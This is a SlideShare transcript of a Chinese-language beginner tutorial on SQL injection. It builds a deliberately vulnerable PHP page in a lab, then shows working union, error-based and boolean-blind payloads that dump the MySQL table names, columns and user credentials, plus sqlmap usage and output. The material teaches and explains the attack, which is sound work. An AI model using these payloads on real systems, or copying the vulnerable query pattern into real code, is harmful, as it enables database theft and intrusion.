SlideShare a Scribd company logo

Sql injection 幼幼班

hugo lu
hugo lu

透過簡單的攻擊範例,說明四種常見的 SQL Injection (Union Based Injection、Error Based Injection、Boolean Based Blind Injection、Time Based Blind Injection),並介紹一款常用的工具 sqlmap。

Engineering
1 of 36
Download to read offline
SQL Injection 幼幼班 Hugo 2016/5/3
Wiki 定義 • SQL攻擊(SQL injection),簡稱隱碼攻擊,是發⽣生 於應⽤用程式之資料庫層的安全漏洞。簡⽽而⾔言之,是在 輸⼊入的字串之中夾帶SQL指令,在設計不良的程式當 中忽略了檢查,那麼這些夾帶進去的指令就會被資料 庫伺服器誤認為是正常的SQL指令⽽而執⾏行,因此遭到 破壞或是⼊入侵。
⼀一個簡單的範例 • 登⼊入驗證的SQL查詢代碼 • strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" • 惡意填⼊入 • userName = "1' OR '1'='1"; • passWord = "1' OR '1'='1"; • SQL查詢命令變成 • strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');" • strSQL = "SELECT * FROM users;" (result=true 無帳號密碼,亦可登⼊入網站)
SQL Injection Lab • 實驗步驟 • 設定被攻擊系統 • Union Based Injection • Error Based Injection • Boolean Based Blind Injection • Time Based Blind Injection • 使⽤用 sqlmap 分析弱點
設定被攻擊系統
新增資料庫 # mysql -uroot -pspy123 test < test.mysql # mysql -uroot -pspy123 test -e "show tables" +----------------+ | Tables_in_test | +----------------+ | fruit | | user | +----------------+ # mysql -uroot -pspy123 test -e "select * from fruit" +----+--------+ | ID | Name | +----+--------+ | 1 | apple | | 2 | banana | | 3 | cherry | | 4 | date | +----+--------+ # mysql -uroot -pspy123 test -e "select * from user" +----+------+------+ | ID | Name | Pass | +----+------+------+ | 1 | aaa | 111 | | 2 | bbb | 222 | | 3 | ccc | 333 | +----+------+------+
hackme.php (攻擊⺫⽬目標) <?php $id= $_GET["id"]; $link = mysql_connect('localhost', 'root', 'spy123'); if (!$link) die('Not connected : ' . mysql_error()); $db_selected = mysql_select_db('test', $link); if (!$db_selected) die ('Can't use foo : ' . mysql_error()); $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; echo $db_query . "<hr>"; $result = mysql_query($db_query); if (!$result) die('Invalid query: ' . mysql_error()); while ($row = mysql_fetch_assoc($result)) { echo "name: " . $row['Name'] . "<br>"; } mysql_free_result($result); ?>
⼩小試⾝身⼿手 • 正常查詢 (https://192.168.200.61/hackme.php?id=1) • Input: 1 • Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1; • Response: name: apple • 測試 input query 是否使⽤用單引號 (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;) • input: 1 >> name: apple • input: 1' >> Invalid query: You have an error in your SQL syntax... • input: 1" >> name: apple • input: 1' or '1'='1 >> name: apple
Union Based Injection
技術描述 • 使⽤用 UNION 將另⼀一段 SELECT 指令加掛在正常輸⼊入 後⾯面,藉此窺探系統資訊。 • The attacker appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT.
推測表格欄位數⺫⽬目 • 原 SQL Query 指令 • $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; • SQL Injection 發現 fruit table 有兩個欄位 • $db_query = "SELECT * FROM fruit WHERE ID='1' union select 1, 2-- -LIMIT 0,1;"; 被註解掉
找出系統資訊 Target Input Response 資料庫名稱 -1' union select 1,database()-- - name: test 系統版本 -1' union select 1,version()-- - name: 5.5.33a-MariaDB 資料庫使⽤用者 -1' union select 1,user()-- - name: root@localhost SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
找出表格名稱 • Input • -1' union select 1,table_name from information_schema.tables where table_schema=database()--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from information_schema.tables where table_schema=database()-- ' LIMIT 0,1; • Response • name: fruit • name: user
找出欄位名稱 • Input • -1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'-- ' LIMIT 0,1; • Response • name: ID • name: Name • name: Pass
找出表格資料 • Input • -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,", ",Name,", ",Pass) from user-- ' LIMIT 0,1; • Response • name: 1, aaa, 111 • name: 2, bbb, 222 • name: 3, ccc, 333
Error Based Injection
技術描述 • 傳遞不乾淨的輸⼊入引發資料庫錯誤,藉由產⽣生的錯誤 進⾏行窺探 • The attacker replaces or appends to the affected parameter a database-specific error message provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
找出當前資料庫名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select database())))-- + • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select database())))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' test'
找出當前表格名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' fruit'
Boolean Based Blind Injection
技術描述 • 有時候系統沒有那麼多的漏洞,能讓你⽤用⽅方便的⽅方式得 到答案,只好跟被攻擊者玩 是/不是 (true/false) 的遊戲。 • 透過 substring(string_to_guess, N,1)=D 資料庫查詢指 令,猜測 string_to_guess 的第 N 個字元是否為 D (⼗十進 位表⽰示) • The attacker replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output.
猜測資料庫版本 • 猜測主版本為 4 • Input:1' and substring(version(),1,1)=4--+ • SQL Query:SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=4-- ' LIMIT 0,1; • Response:(沒輸出資料) • 猜測主版本為 5 • Input:1' and substring(version(),1,1)=5--+ • SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=5-- ' LIMIT 0,1; • Response:name: apple
猜測表格名稱 • Input • 1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), 1,1))>64--+ • SQL Query • SELECT * FROM fruit WHERE ID='1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1; • Steps • >64 (有反應); >112 (無反應); >95 (有反應); >110 (無反應); >103 (無反應); 
 >100 (有反應); >102 (無反應); >101 (有反應); =102 (有反應) • 表格第⼀一個字: “f" (⼗十進位=102),重複以上步驟猜出表格名稱: "fruit"
猜測欄位名稱 • 猜 fruit table 第⼀一個欄位名稱的字⺟母 • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),1,1))=73--+ • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),2,1))=68--+ • fruit 表格第⼀一個欄位名稱: "ID" (⼗十進位=73, 68)
猜測欄位資料 • 表格(fruit) 第⼆二筆資料 欄位 (Name) 的值 • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+ • 欄位值: “banana” (⼗十進位=98, 97, 100, 97, 110, 97)
Time Based Blind Injection
技術描述 • 更糟的情形是⺫⽬目標連 是/不是 (true/false) 的遊戲都不 跟你玩,只能透過延遲時間的⽅方式窺探系統資訊。 • Time-based techniques are often used to achieve tests when there is no other way to retrieve information from the database server. This kind of attack injects a SQL segment which contains specific DBMS function or heavy query that generates a time delay.
猜出 SQL Query 的⽅方式 • 註解⽅方式: --+ • SQL Query: SELECT * FROM fruit WHERE ID=‘1’
使⽤用 sqlmap 分析弱點
為什麼要⽤用 sqlmap • 攻擊者不知道 SQL Query 的⻑⾧長相 • 猜測系統漏洞通常耗時費⼒力
指令 • # sqlmap -u "https://192.168.200.61/hackme.php? id=1" --force-ssl --dbms=mysql -p id • -u "https://192.168.200.61/..." ,要攻擊的URL • --force-ssl ,強制使⽤用 SSL/HTTPS • --dbms=mysql ,強制後端 DBMS 種類 • -p id ,要測試的參數
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775 456778504d50744e504951505a54,0x71766b7871)-- -
以上實驗純屬虛構
 如有雷同純屬巧合
Magic Quotes 被關閉了 • 防⽌止 user 端送到 server 端的資料,會被惡意內容攻擊。 • 當 magic_quotes_gpc=on 時,$_GET、$_POST、$_COOKIE 等 等從 user 端來的資料,如果含有單引號、雙引號、反斜線等內 容,會⾃自動被加⼀一條反斜線在前⾯面,把該字元跳脫掉。 • echo.php <?php echo $_GET["input"]; ?> • HTTP GET https://192.168.200.61/echo.php?input=hugo's secret magic_quotes_gpc Response On hugo's secret Off hugo's secret
參考資料 • http://securityidiots.com/Web-Pentest/SQL-Injection • https://github.com/sqlmapproject/sqlmap/wiki/ Usage • http://php.net/manual/en/ security.magicquotes.disabling.php

Recommended

Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.
 
What you need to know for postgresql operation
What you need to know for postgresql operationWhat you need to know for postgresql operation
What you need to know for postgresql operation
Anton Bushmelev
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
 
Laravelとテストについて
LaravelとテストについてLaravelとテストについて
Laravelとテストについて
Takeo Noda
 
Percona toolkit
Percona toolkitPercona toolkit
Percona toolkit
Karwin Software Solutions LLC
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
Orange Tsai
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
sumsid1234
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証
ME iBotch
 

Recommended

Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.
 
What you need to know for postgresql operation
What you need to know for postgresql operationWhat you need to know for postgresql operation
What you need to know for postgresql operation
Anton Bushmelev
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
Orange Tsai
 
Laravelとテストについて
LaravelとテストについてLaravelとテストについて
Laravelとテストについて
Takeo Noda
 
Percona toolkit
Percona toolkitPercona toolkit
Percona toolkit
Karwin Software Solutions LLC
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
Orange Tsai
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
sumsid1234
 
Codeigniter4の比較と検証
Codeigniter4の比較と検証Codeigniter4の比較と検証
Codeigniter4の比較と検証
ME iBotch
 
SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)
Tomoaki Uchida
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
Karwin Software Solutions LLC
 
実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン
Hiroyasu Suzuki
 
Survey of Percona Toolkit
Survey of Percona ToolkitSurvey of Percona Toolkit
Survey of Percona Toolkit
Karwin Software Solutions LLC
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
Hadess
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のり
Shinichi Tomita
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング
yoku0825
 
PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs
PGConf APAC
 
SRE Conference 2022 - How to Build a Healthy On-Call Culture
SRE Conference 2022 - How to Build a Healthy On-Call CultureSRE Conference 2022 - How to Build a Healthy On-Call Culture
SRE Conference 2022 - How to Build a Healthy On-Call Culture
smalltown
 
Practical Malware Analysis Ch13
Practical Malware Analysis Ch13Practical Malware Analysis Ch13
Practical Malware Analysis Ch13
Sam Bowne
 
Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.
Alexey Lesovsky
 
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
PgDay.Seoul
 
EC2でマルチキャスト
EC2でマルチキャストEC2でマルチキャスト
EC2でマルチキャスト
Kenta Yasukawa
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
Angel Boy
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Models for hierarchical data
Models for hierarchical dataModels for hierarchical data
Models for hierarchical data
Karwin Software Solutions LLC
 
JAZUG #26 AKS backup with Velero
JAZUG #26 AKS backup with VeleroJAZUG #26 AKS backup with Velero
JAZUG #26 AKS backup with Velero
Tetsuya Sodo
 
MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바
NeoClova
 
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
NAVER D2
 
WSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer GuideWSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer Guide
hugo lu
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials Point
Al Zarqali
 

More Related Content

What's hot

SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)
Tomoaki Uchida
 
実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン
Hiroyasu Suzuki
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のり
Shinichi Tomita
 
EC2でマルチキャスト
EC2でマルチキャストEC2でマルチキャスト
EC2でマルチキャスト
Kenta Yasukawa
 
MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바
NeoClova
 

What's hot (20)

SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)SQLアンチパターン(インデックスショットガン)
SQLアンチパターン(インデックスショットガン)
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
 
実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン実践!AWSクラウドデザインパターン
実践!AWSクラウドデザインパターン
 
Survey of Percona Toolkit
Survey of Percona ToolkitSurvey of Percona Toolkit
Survey of Percona Toolkit
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のり
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング
 
PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs PostgreSQL WAL for DBAs
PostgreSQL WAL for DBAs
 
SRE Conference 2022 - How to Build a Healthy On-Call Culture
SRE Conference 2022 - How to Build a Healthy On-Call CultureSRE Conference 2022 - How to Build a Healthy On-Call Culture
SRE Conference 2022 - How to Build a Healthy On-Call Culture
 
Practical Malware Analysis Ch13
Practical Malware Analysis Ch13Practical Malware Analysis Ch13
Practical Malware Analysis Ch13
 
Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.Deep dive into PostgreSQL statistics.
Deep dive into PostgreSQL statistics.
 
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
[Pgday.Seoul 2017] 3. PostgreSQL WAL Buffers, Clog Buffers Deep Dive - 이근오
 
EC2でマルチキャスト
EC2でマルチキャストEC2でマルチキャスト
EC2でマルチキャスト
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Models for hierarchical data
Models for hierarchical dataModels for hierarchical data
Models for hierarchical data
 
JAZUG #26 AKS backup with Velero
JAZUG #26 AKS backup with VeleroJAZUG #26 AKS backup with Velero
JAZUG #26 AKS backup with Velero
 
MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바MariaDB 마이그레이션 - 네오클로바
MariaDB 마이그레이션 - 네오클로바
 
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
[212]C3, 데이터 처리에서 서빙까지 가능한 하둡 클러스터
 

Viewers also liked

Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
matt_presson
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......
hugo lu
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
hugo lu
 

Viewers also liked (20)

WSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer GuideWSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer Guide
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials Point
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Continuous integration
Continuous integrationContinuous integration
Continuous integration
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
從模組到類別
從模組到類別從模組到類別
從模組到類別
 
流程語法與函式
流程語法與函式流程語法與函式
流程語法與函式
 
Dev ops 簡介
Dev ops 簡介Dev ops 簡介
Dev ops 簡介
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......
 
Python 起步走
Python 起步走Python 起步走
Python 起步走
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 
初學R語言的60分鐘
初學R語言的60分鐘初學R語言的60分鐘
初學R語言的60分鐘
 
References
ReferencesReferences
References
 
Kernel Debugging & Profiling
Kernel Debugging & ProfilingKernel Debugging & Profiling
Kernel Debugging & Profiling
 
Block Drivers
Block DriversBlock Drivers
Block Drivers
 
Character Drivers
Character DriversCharacter Drivers
Character Drivers
 
File System Modules
File System ModulesFile System Modules
File System Modules
 
Network Drivers
Network DriversNetwork Drivers
Network Drivers
 

Similar to Sql injection 幼幼班

SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
Michael Coates
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
Colin O'Dell
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Colin O'Dell
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
badhanbd
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
DataWorks Summit
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 

Similar to Sql injection 幼幼班 (20)

03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
Sql injection
Sql injectionSql injection
Sql injection
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacks
 
PHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQLPHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQL
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & Defenses
 
Sql injection
Sql injectionSql injection
Sql injection
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteDEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq lite
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
Sql Injection
Sql InjectionSql Injection
Sql Injection
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 

More from hugo lu

精實執行工作坊
精實執行工作坊精實執行工作坊
精實執行工作坊
hugo lu
 
Testing in swift
Testing in swiftTesting in swift
Testing in swift
hugo lu
 
看板實驗室
看板實驗室看板實驗室
看板實驗室
hugo lu
 
嵌入式測試驅動開發
嵌入式測試驅動開發嵌入式測試驅動開發
嵌入式測試驅動開發
hugo lu
 

More from hugo lu (8)

Sql or no sql, that is the question
Sql or no sql, that is the questionSql or no sql, that is the question
Sql or no sql, that is the question
 
Swift 2.0 的新玩意
Swift 2.0 的新玩意Swift 2.0 的新玩意
Swift 2.0 的新玩意
 
精實執行工作坊
精實執行工作坊精實執行工作坊
精實執行工作坊
 
Testing in swift
Testing in swiftTesting in swift
Testing in swift
 
畫出商業模式
畫出商業模式畫出商業模式
畫出商業模式
 
精實軟體度量
精實軟體度量精實軟體度量
精實軟體度量
 
看板實驗室
看板實驗室看板實驗室
看板實驗室
 
嵌入式測試驅動開發
嵌入式測試驅動開發嵌入式測試驅動開發
嵌入式測試驅動開發
 

Recently uploaded

Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills KuwaitKuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
Kuwait City MTP kit ((+919101817206)) Buy Abortion Pills Kuwait
jaanualu31
 
Online food ordering system project report.pdf
Online food ordering system project report.pdfOnline food ordering system project report.pdf
Online food ordering system project report.pdf
Kamal Acharya
 
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments""Lesotho Leaps Forward: A Chronicle of Transformative Developments"
"Lesotho Leaps Forward: A Chronicle of Transformative Developments"
mphochane1998
 
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
1_Introduction + EAM Vocabulary + how to navigate in EAM.pdf
AldoGarca30
 
Standard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power PlayStandard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power Play
Epec Engineered Technologies
 

Recently uploaded (20)

Work-Permit-Receiver-in-Saudi-Aramco.pptx
Work-Permit-Receiver-in-Saudi-Aramco.pptxWork-Permit-Receiver-in-Saudi-Aramco.pptx
Work-Permit-Receiver-in-Saudi-Aramco.pptx
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdf
 
A Study of Urban Area Plan for Pabna Municipality
A Study of Urban Area Plan for Pabna MunicipalityA Study of Urban Area Plan for Pabna Municipality
A Study of Urban Area Plan for Pabna Municipality
 
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKARHAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
 
